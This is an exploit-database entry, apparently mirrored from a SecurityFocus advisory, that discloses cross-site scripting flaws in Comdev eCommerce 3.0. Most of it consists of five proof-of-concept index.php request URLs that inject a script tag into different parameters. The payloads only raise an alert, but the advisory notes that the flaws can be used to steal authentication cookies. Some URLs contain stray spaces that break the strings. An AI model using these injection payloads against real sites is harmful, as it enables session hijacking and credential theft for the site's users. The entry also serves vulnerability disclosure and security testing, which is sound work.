exploit-db-mirror/exploits/php/webapps/25062.txt

source: https://www.securityfocus.com/bid/12382/info

Comdev eCommerce is reported prone to multiple cross-site scripting vulnerabilities. These may facilitate theft of cookie-based authentication credentials as well as other attacks.

Comdev eCommerce 3.0 is reported prone to these issues. It is likely that previous versions are vulnerable as well. 

index.php?product_id=477&pageactionprev=viewpricelist&sta rt=0"><script>alert(document.domain);</script>&category_id=&keyword=
index.php?product_id=477&pageactionprev=viewpricelist&start=0&category_id="><script>alert(document.d omain);</script>&keyword=
index.php?product_id=477&pageactionprev=viewpricelist&start=0&category_id=&keyword="><script>alert(document.domain);</script>
index.php?pageac tion=viewpricelist"><script>alert(document.domain);</script>
index.php?product_id=477"><script>alert(document.domain);</script>&pageactionprev=viewpricelist&start=0&cate gory_id=&keyword=